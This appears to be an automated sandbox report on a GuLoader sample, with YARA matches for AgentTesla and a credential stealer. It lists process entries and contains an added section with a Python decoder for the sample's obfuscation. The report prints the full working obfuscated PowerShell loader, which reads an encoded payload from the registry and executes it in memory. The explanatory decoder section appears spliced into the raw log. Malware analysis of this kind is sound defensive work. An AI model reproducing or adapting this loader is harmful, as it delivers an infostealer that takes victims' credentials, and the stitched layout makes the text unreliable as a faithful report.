                                Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl 
BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TakRaeOcrSpnDieSelHa3Ax2Ne`"""Ov)Su]InpTouVibStlSaiFucAb HasBltPhaDitFeiMacTo paeWaxSltSleRarTenCa ThiDenkatOv MiVJeiRersktLuuDiabalUnAPylUnlDaoCocAb(moimunGatke FevNa1Da,KoiGrnAntbi FivCr2Se,KriLanhvtAg Savaa3go,NoilenMatNa PavSe4Co)Im;Ma[DeDTilStlStIKlmpupLuoCarMitHa(Tv`"""BakVieEnrBenSteEllTh3Hu2bi`"""Tr)Pl]PopHauLabsalIniRacFj UnsBetBoasltDkiPocHi PhevaxGntNoeGurMrnFl AcIAgnIntKoPDatAnrOs SwELinWeuHamStSCoySksMatSlePlmfeLMooKacdeaKolCueSysDyWaf(OmuFoiBonChtMy TavBo1Ha,KiiSonOptSh FavUn2Ud)Un;Na}Li'Sl;Ar`$jeMHyeDatSuhmuyUrlLi3Ne=Ha[TiMAdeLytFehFoyMilCa1re]co:Ov:beVNoisyrretWhuAbaTelNoAAklGalUnoSicLi(In0Dr,ro1Ch0De4Ro8Le5Ob7sk6Co,Le1Me2Sp2Sv8Lo8Ea,No6ph4Mi)Mi;Re`$StSTaeBelKovRefLrlTrgEbeNylBeiBrgDu=Pr(BrGFieGytDe-reISttKreViminPDorSaoIrpBeeLarJetAfySc Ex-WoPCraSptAzhDe 
Tr'SvHveKFoCCoUUd:Co\CebKraResAnaBrlBotCa\DetAprGuaManFisNofEsonurMemKoaSktSkiByoAbnOushaaSulScgCioSkrExiVitCimSieCyregnIreUd'Pa)tu.LuBBoeEthsueAlaDyrStsReeJa;Be`$UnGHirEmiFosRakUneEn Bu=Bi Br[AsSTiyUnsObtTweDrmBe.LiCStoRenorvKieVarAptEn]Ma:Ap:GeFKlrInoMumUdBseaImsInePl6fi4CaSVotBarBaiTonWagva(Se`$BeSLeeSnlBlvJafHulAfgpeeFrlBeiPhgGi)Ap;Pu[PiSOvyelsThtOxeSemge.SiRObuFrnBrtapiMumKleju.PiISpnRatIneUnrSyoAppneSPreSkrCovTiiJacAkeLessl.SiMStaTarFosCohTaaprlFa]Bl:Ci:TrCBooOupSkyAf(Fl`$UnGKurPaiKrsBrkDrece,di Pe0Up,Br Vl Pi`$GlMNieBatBlhSiyMylDe3Pr,Pr Sp`$ZoGArrCriTesHakPheSt.PrcGroSpuPonKntSp)Ph;Ho[TiMHeeAltAkhKnyPrlFa1Au]Si:Ru:CuEHjnPruMemFrSKoyressetKoeSpmVoLSloNucCaaMulpeeinsOvWBr(Sa`$AvMSkeNotSthDdyStlMe3Ir,Ka Ud0Sl)Ne#Sc;""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;;
                                Imagebase:0xcd0000
                                File size:433152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:moderate
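The PowerShell command line above hides its real script with a fixed-stride encoding: the `Methyl4` function defined at its end keeps every third character of `$Thyridia`, starting at offset 2 and stopping before the last index, and the result is handed to the cmdlet recovered the same way from `'SoIOrEReXAq '`. The decoder below is an added example, not code from the report or from the sample; it reimplements that loop in Python so the stage can be recovered offline without running it. The embedded fragment is the first 315 characters of `$Thyridia` copied verbatim from the command line above; the regexes that pull `$Thyridia` and the invoker token out of a raw command line are written for this sample's layout and are an assumption for any other.

```python
import re
from typing import Optional, Tuple

def methyl4_decode(encoded: str) -> str:
    """Reimplementation of the sample's Methyl4 routine.

    PowerShell original (from the command line above):
        For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1) }
    Each plaintext byte is wrapped in two junk bytes, so every third character
    from offset 2 is kept. The loop bound is Length-1, not Length: a plaintext
    byte sitting on the final index is dropped, which is why the IEX token
    carries a trailing space to absorb it.
    """
    return "".join(encoded[i] for i in range(2, len(encoded) - 1, 3))

# $Undefatigable0 in the command line above; decodes to the invoker cmdlet.
INVOKER_TOKEN = "SoIOrEReXAq "

# First 315 characters of $Thyridia, copied verbatim from the command line above.
THYRIDIA_PREFIX = (
    "ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy "
    "Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;"
    "VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa."
    "HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;"
    "TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{"
)

# Layout-specific extractors (assumption: the variable names and the triple-quote
# delimiters are those of this sample; other GuLoader builds rename them).
PAYLOAD_RE = re.compile(r'\$Thyridia = """(?P<enc>.*?)""";', re.S)
INVOKER_RE = re.compile(r"\$Undefatigable0 = Methyl4 '(?P<tok>[^']*)'")

def extract_encoded_payload(cmdline: str) -> Optional[str]:
    m = PAYLOAD_RE.search(cmdline)
    return m.group("enc") if m else None

def extract_invoker_token(cmdline: str) -> Optional[str]:
    m = INVOKER_RE.search(cmdline)
    return m.group("tok") if m else None

def decode_stage(cmdline: str) -> Tuple[str, str]:
    """Return (invoker, decoded script) for a raw powershell.exe command line."""
    enc = extract_encoded_payload(cmdline)
    tok = extract_invoker_token(cmdline)
    if enc is None or tok is None:
        raise ValueError("command line does not carry the $Thyridia/Methyl4 pattern")
    return methyl4_decode(tok), methyl4_decode(enc)

if __name__ == "__main__":
    print(methyl4_decode(INVOKER_TOKEN))        # the cmdlet that runs the stage
    print(methyl4_decode(THYRIDIA_PREFIX))      # opening of the decoded stage
```

Run against the fragment, the decoder yields `Add-Type -TypeDefinition 'using System;using System.Runtime.InteropServices;public static class Methyl1 `, i.e. a P/Invoke class being compiled in place, which is exactly why csc.exe and cvtres.exe appear as Target IDs 15 and 16 below with a `.cmdline` in `%TEMP%`. Feeding the full command line from the report to `decode_stage` recovers the whole stage; the script's own `$Undefatigable0`/`$Undefatigable1` names are only used by the extractors.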

                                Target ID:5
                                Start time:18:12:59
                                Start date:28/11/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b8be0000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:15
                                Start time:18:13:30
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
                                Imagebase:0xbb0000
                                File size:2141552 bytes
                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:moderate

                                Target ID:16
                                Start time:18:13:31
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
                                Imagebase:0x3a0000
                                File size:46832 bytes
                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:17
                                Start time:18:13:51
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                                Imagebase:0xc90000
                                File size:106496 bytes
                                MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                No disassembly